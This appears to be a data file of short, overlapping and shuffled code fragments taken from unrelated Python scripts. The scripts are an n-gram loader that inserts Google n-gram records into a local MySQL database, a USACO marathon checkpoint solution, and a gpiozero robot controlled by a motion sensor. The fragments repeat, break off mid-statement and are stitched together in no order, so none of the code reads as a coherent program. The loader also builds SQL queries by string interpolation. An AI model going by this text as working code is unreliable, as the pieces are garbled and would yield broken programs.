"if __name__ == \"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1',",
"for line in file: # count = count + 1 # if count",
"line in file: # count = count + 1 # if count >",
"password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for",
"possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally: db.commit() cursor.close() db.close()",
"= pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') #",
"words = content[1] content = words.split(' ') under_word = content[0] after_word = content[1]",
"# user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() #",
"(622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor",
"213054597: content = line.split('\\t') possibility = content[0] words = content[1] content = words.split('",
"db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line",
"+ 1 # if count > (622009+5): # break # if count >=6",
"in file: # count = count + 1 # if count > (622009+5):",
"> (622009+5): # break # if count >=6 and count <= (622009+5): #",
"= '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES",
"pymysql if __name__ == \"__main__\": # # ngram_1 # try: # db =",
"with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count +1 if",
"# if count >=6 and count <= (622009+5): # ngram_2 try: db =",
"traceback import pymysql if __name__ == \"__main__\": # # ngram_1 # try: #",
"# '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file: # count",
"with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file:",
"# ) as file: # for line in file: # count = count",
"user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop",
"content[1] content = words.split(' ') under_word = content[0] after_word = content[1] punishment =",
"line in file: count = count +1 if count >=622017 and count <=",
"') under_word = content[0] after_word = content[1] punishment = '-99' sql = 'insert",
"# try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', #",
">=622017 and count <= 213054597: content = line.split('\\t') possibility = content[0] words =",
"ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor()",
"db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count =",
"password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5",
"ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except",
"db.cursor() # ngram_stop = 622009+5 # count = 0 # with open( #",
"and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>',",
"content[1] punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment",
"if count >=6 and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1',",
"count = count +1 if count >=622017 and count <= 213054597: content =",
"<filename>insert_data.py import main import traceback import pymysql if __name__ == \"__main__\": # #",
"'-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word,",
"# # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root',",
"count + 1 # if count > (622009+5): # break # if count",
"count <= 213054597: content = line.split('\\t') possibility = content[0] words = content[1] content",
"= words.split(' ') under_word = content[0] after_word = content[1] punishment = '-99' sql",
"content = line.split('\\t') possibility = content[0] words = content[1] content = words.split(' ')",
"__name__ == \"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', #",
"under_word = content[0] after_word = content[1] punishment = '-99' sql = 'insert into",
"# count = count + 1 # if count > (622009+5): # break",
"( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception",
"(\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally: db.commit()",
">=6 and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root',",
"= 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility,",
"possibility = content[0] words = content[1] content = words.split(' ') under_word = content[0]",
"port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as",
"if count >=622017 and count <= 213054597: content = line.split('\\t') possibility = content[0]",
"as file: # for line in file: # count = count + 1",
"= content[0] after_word = content[1] punishment = '-99' sql = 'insert into ngram_2",
"try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams',",
"= content[1] content = words.split(' ') under_word = content[0] after_word = content[1] punishment",
") VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc()",
"+1 if count >=622017 and count <= 213054597: content = line.split('\\t') possibility =",
"=0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count +1",
"ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback()",
"after_word = content[1] punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word,",
"ngram_stop = 622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' #",
"pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor",
"file: # count = count + 1 # if count > (622009+5): #",
"import pymysql if __name__ == \"__main__\": # # ngram_1 # try: # db",
"# ngram_stop = 622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered'",
"# ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor =",
"db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0",
"count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: #",
"count >=6 and count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306,",
"punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment )",
"user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file:",
"# count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file:",
"content = words.split(' ') under_word = content[0] after_word = content[1] punishment = '-99'",
"file: # for line in file: # count = count + 1 #",
"== \"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306,",
"# break # if count >=6 and count <= (622009+5): # ngram_2 try:",
"622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as",
"= pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with",
"open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count +1 if count",
"words.split(' ') under_word = content[0] after_word = content[1] punishment = '-99' sql =",
"= db.cursor() # ngram_stop = 622009+5 # count = 0 # with open(",
"# password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop =",
"= count + 1 # if count > (622009+5): # break # if",
"# db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', #",
"as file: for line in file: count = count +1 if count >=622017",
"if count > (622009+5): # break # if count >=6 and count <=",
"# port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor =",
") as file: # for line in file: # count = count +",
"# charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 # count =",
"into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql)",
"db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8')",
"count <= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams',",
"content[0] words = content[1] content = words.split(' ') under_word = content[0] after_word =",
"'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment)",
"# for line in file: # count = count + 1 # if",
"and count <= 213054597: content = line.split('\\t') possibility = content[0] words = content[1]",
"# cursor = db.cursor() # ngram_stop = 622009+5 # count = 0 #",
"sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word,",
"1 # if count > (622009+5): # break # if count >=6 and",
"in file: count = count +1 if count >=622017 and count <= 213054597:",
"= 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for",
"'/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file: # count =",
"for line in file: count = count +1 if count >=622017 and count",
"import traceback import pymysql if __name__ == \"__main__\": # # ngram_1 # try:",
"try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count",
"\"__main__\": # # ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, #",
"break # if count >=6 and count <= (622009+5): # ngram_2 try: db",
"= line.split('\\t') possibility = content[0] words = content[1] content = words.split(' ') under_word",
"count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count = count",
"= content[1] punishment = '-99' sql = 'insert into ngram_2 ( ngram2_under_word, ngram2_after_word,",
"content[0] after_word = content[1] punishment = '-99' sql = 'insert into ngram_2 (",
"open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in file: #",
"port=3306, # user='root', # password='<PASSWORD>', # db='n_grams', # charset='utf8') # cursor = db.cursor()",
"count > (622009+5): # break # if count >=6 and count <= (622009+5):",
"count >=622017 and count <= 213054597: content = line.split('\\t') possibility = content[0] words",
"(622009+5): # break # if count >=6 and count <= (622009+5): # ngram_2",
"main import traceback import pymysql if __name__ == \"__main__\": # # ngram_1 #",
"# with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line in",
"cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file:",
"ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex:",
"# db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 #",
"0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # ) as file: # for line",
"file: count = count +1 if count >=622017 and count <= 213054597: content",
"= 622009+5 # count = 0 # with open( # '/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered' # )",
"file: for line in file: count = count +1 if count >=622017 and",
"line.split('\\t') possibility = content[0] words = content[1] content = words.split(' ') under_word =",
"= content[0] words = content[1] content = words.split(' ') under_word = content[0] after_word",
"count = count + 1 # if count > (622009+5): # break #",
"cursor = db.cursor() # ngram_stop = 622009+5 # count = 0 # with",
"<= 213054597: content = line.split('\\t') possibility = content[0] words = content[1] content ="
] |
[
"sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum",
"########## import sys # Reads in the file marathon.in. def readin(): f =",
"min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) + \"\\n\") g.close()",
"the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum = 0 i",
"temp = l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1",
"in temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min =",
"int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1]",
"min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) + \"\\n\") g.close() main()",
"i < int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0])",
"int(l[0]): #makes checkpoints into a 2D list temp = l[i].split() temp = [int(el)",
"for el in temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints)",
"i = 1 total = checkSum(checkpoints) min = total while i < int(l[0])",
"main(): l = readin() checkpoints = [] i = 1 while i <=",
"while i < int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] -",
"abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function",
"# Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s =",
"= 1 while i <= int(l[0]): #makes checkpoints into a 2D list temp",
"- 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1",
"i <= int(l[0]): #makes checkpoints into a 2D list temp = l[i].split() temp",
"+= (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works:",
"i+= 1 return sum #Main function def main(): l = readin() checkpoints =",
"supposedly \"Manhattan\" distance of the list. def checkSum(L): sum = 0 i =",
"Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum = 0",
"1 while i <= int(l[0]): #makes checkpoints into a 2D list temp =",
"care of the missing checkpoint Bessie skips. if total1 < min: min =",
"+ abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def main(): l",
"= f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance of the",
"return sum #Main function def main(): l = readin() checkpoints = [] i",
"- checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] -",
"missing checkpoint Bessie skips. if total1 < min: min = total1 i+= 1",
"2D list temp = l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp)",
"checkpoint Bessie skips. if total1 < min: min = total1 i+= 1 g",
"marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s #",
"the distance between the checkpoints before and after. This will take care of",
"PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys #",
"Bessie skips. if total1 < min: min = total1 i+= 1 g =",
"i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] -",
"0 while i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) +",
"checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] -",
"1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys",
"i+= 1 i = 1 total = checkSum(checkpoints) min = total while i",
"- checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The",
"- L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def",
"sum = 0 i = 0 while i < len(L) - 1: sum",
"into a 2D list temp = l[i].split() temp = [int(el) for el in",
"The way this works: take the original total, and subtract the distances to",
"of the missing checkpoint Bessie skips. if total1 < min: min = total1",
"total = checkSum(checkpoints) min = total while i < int(l[0]) - 1: total1",
"- L[i+1][1]) i+= 1 return sum #Main function def main(): l = readin()",
"the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return",
"= 0 while i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0])",
"BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads in the file",
"= readin() checkpoints = [] i = 1 while i <= int(l[0]): #makes",
"= [int(el) for el in temp] checkpoints.append(temp) i+= 1 i = 1 total",
"[int(el) for el in temp] checkpoints.append(temp) i+= 1 i = 1 total =",
"Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\")",
"= 1 total = checkSum(checkpoints) min = total while i < int(l[0]) -",
"certain checkpoint. Then add the distance between the checkpoints before and after. This",
"works: take the original total, and subtract the distances to and from a",
"l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1 i =",
"1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return",
"# PYTHON 2.7.6 ########## import sys # Reads in the file marathon.in. def",
"abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the original total, and",
"subtract the distances to and from a certain checkpoint. Then add the distance",
"and after. This will take care of the missing checkpoint Bessie skips. if",
"checkSum(L): sum = 0 i = 0 while i < len(L) - 1:",
"= total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0]",
"el in temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min",
"and subtract the distances to and from a certain checkpoint. Then add the",
"<NAME> # PYTHON 2.7.6 ########## import sys # Reads in the file marathon.in.",
"- checkpoints[i-1][1])) # The way this works: take the original total, and subtract",
"- 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] -",
"< min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) + \"\\n\")",
"after. This will take care of the missing checkpoint Bessie skips. if total1",
"checkpoints[i-1][1])) # The way this works: take the original total, and subtract the",
"temp] checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min = total",
"this works: take the original total, and subtract the distances to and from",
"original total, and subtract the distances to and from a certain checkpoint. Then",
"to and from a certain checkpoint. Then add the distance between the checkpoints",
"the missing checkpoint Bessie skips. if total1 < min: min = total1 i+=",
"total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) +",
"while i <= int(l[0]): #makes checkpoints into a 2D list temp = l[i].split()",
"= 0 i = 0 while i < len(L) - 1: sum +=",
"l = readin() checkpoints = [] i = 1 while i <= int(l[0]):",
"+ abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1]))",
"= total while i < int(l[0]) - 1: total1 = total total1 -=",
"while i < len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1]",
"total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] -",
"0 i = 0 while i < len(L) - 1: sum += abs(L[i][0]",
"skips. if total1 < min: min = total1 i+= 1 g = open(\"marathon.out\",'w')",
"< len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1])",
"1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1])",
"f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance of the list.",
"total1 < min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min) +",
"SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads in the",
"import sys # Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r')",
"the original total, and subtract the distances to and from a certain checkpoint.",
"1 i = 1 total = checkSum(checkpoints) min = total while i <",
"= l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1 i",
"the checkpoints before and after. This will take care of the missing checkpoint",
"list. def checkSum(L): sum = 0 i = 0 while i < len(L)",
"s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance of",
"way this works: take the original total, and subtract the distances to and",
"+ abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the original total,",
"<= int(l[0]): #makes checkpoints into a 2D list temp = l[i].split() temp =",
"len(L) - 1: sum += abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+=",
"2.7.6 ########## import sys # Reads in the file marathon.in. def readin(): f",
"abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 +=",
"# The way this works: take the original total, and subtract the distances",
"and from a certain checkpoint. Then add the distance between the checkpoints before",
"between the checkpoints before and after. This will take care of the missing",
"total while i < int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0]",
"= [] i = 1 while i <= int(l[0]): #makes checkpoints into a",
"# Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum =",
"before and after. This will take care of the missing checkpoint Bessie skips.",
"Then add the distance between the checkpoints before and after. This will take",
"the distances to and from a certain checkpoint. Then add the distance between",
"abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) +",
"checkpoints before and after. This will take care of the missing checkpoint Bessie",
"PYTHON 2.7.6 ########## import sys # Reads in the file marathon.in. def readin():",
"open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\" distance",
"if total1 < min: min = total1 i+= 1 g = open(\"marathon.out\",'w') g.write(str(min)",
"take the original total, and subtract the distances to and from a certain",
"# USACO CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6",
"the list. def checkSum(L): sum = 0 i = 0 while i <",
"checkpoint. Then add the distance between the checkpoints before and after. This will",
"checkpoints = [] i = 1 while i <= int(l[0]): #makes checkpoints into",
"file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s",
"sys # Reads in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s",
"1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads",
"#Main function def main(): l = readin() checkpoints = [] i = 1",
"total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0])",
"def checkSum(L): sum = 0 i = 0 while i < len(L) -",
"def main(): l = readin() checkpoints = [] i = 1 while i",
"list temp = l[i].split() temp = [int(el) for el in temp] checkpoints.append(temp) i+=",
"distances to and from a certain checkpoint. Then add the distance between the",
"CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import",
"-= (abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) +",
"i = 1 while i <= int(l[0]): #makes checkpoints into a 2D list",
"\"Manhattan\" distance of the list. def checkSum(L): sum = 0 i = 0",
"This will take care of the missing checkpoint Bessie skips. if total1 <",
"checkpoints into a 2D list temp = l[i].split() temp = [int(el) for el",
"[] i = 1 while i <= int(l[0]): #makes checkpoints into a 2D",
"1 return sum #Main function def main(): l = readin() checkpoints = []",
"#makes checkpoints into a 2D list temp = l[i].split() temp = [int(el) for",
"+ abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1",
"checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way",
"def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks",
"total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this",
"function def main(): l = readin() checkpoints = [] i = 1 while",
"return s # Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L):",
"- checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1]",
"checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the original",
"a certain checkpoint. Then add the distance between the checkpoints before and after.",
"i = 0 while i < len(L) - 1: sum += abs(L[i][0] -",
"distance of the list. def checkSum(L): sum = 0 i = 0 while",
"in the file marathon.in. def readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close()",
"= open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly \"Manhattan\"",
"of the list. def checkSum(L): sum = 0 i = 0 while i",
"+= abs(L[i][0] - L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main",
"checkSum(checkpoints) min = total while i < int(l[0]) - 1: total1 = total",
"USACO CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON 2.7.6 ##########",
"# SOLUTION BY <NAME> # PYTHON 2.7.6 ########## import sys # Reads in",
"checkpoints.append(temp) i+= 1 i = 1 total = checkSum(checkpoints) min = total while",
"1 total = checkSum(checkpoints) min = total while i < int(l[0]) - 1:",
"take care of the missing checkpoint Bessie skips. if total1 < min: min",
"from a certain checkpoint. Then add the distance between the checkpoints before and",
"will take care of the missing checkpoint Bessie skips. if total1 < min:",
"sum #Main function def main(): l = readin() checkpoints = [] i =",
"- checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take the",
"L[i+1][1]) i+= 1 return sum #Main function def main(): l = readin() checkpoints",
"f.close() return s # Checks the supposedly \"Manhattan\" distance of the list. def",
"checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1]))",
"distance between the checkpoints before and after. This will take care of the",
"s # Checks the supposedly \"Manhattan\" distance of the list. def checkSum(L): sum",
"abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) #",
"temp = [int(el) for el in temp] checkpoints.append(temp) i+= 1 i = 1",
"########## # USACO CONTEST 1 PROBLEM 1 # SOLUTION BY <NAME> # PYTHON",
"L[i+1][0]) + abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def main():",
"min = total while i < int(l[0]) - 1: total1 = total total1",
"+ abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] - checkpoints[i-1][0])",
"- checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0]",
"(abs(checkpoints[i][0] - checkpoints[i-1][0]) + abs(checkpoints[i][1] - checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1]",
"< int(l[0]) - 1: total1 = total total1 -= (abs(checkpoints[i][0] - checkpoints[i-1][0]) +",
"a 2D list temp = l[i].split() temp = [int(el) for el in temp]",
"checkpoints[i-1][1]) + abs(checkpoints[i+1][0] - checkpoints[i][0]) + abs(checkpoints[i+1][1] - checkpoints[i][1])) total1 += (abs(checkpoints[i+1][0] -",
"total, and subtract the distances to and from a certain checkpoint. Then add",
"add the distance between the checkpoints before and after. This will take care",
"readin(): f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the",
"= checkSum(checkpoints) min = total while i < int(l[0]) - 1: total1 =",
"(abs(checkpoints[i+1][0] - checkpoints[i-1][0]) + abs(checkpoints[i+1][1] - checkpoints[i-1][1])) # The way this works: take",
"f = open(\"marathon.in\",'r') s = f.read().split(\"\\n\") f.close() return s # Checks the supposedly",
"readin() checkpoints = [] i = 1 while i <= int(l[0]): #makes checkpoints",
"abs(L[i][1] - L[i+1][1]) i+= 1 return sum #Main function def main(): l ="
] |
[
"pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward",
"14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion = robot.stop pause()",
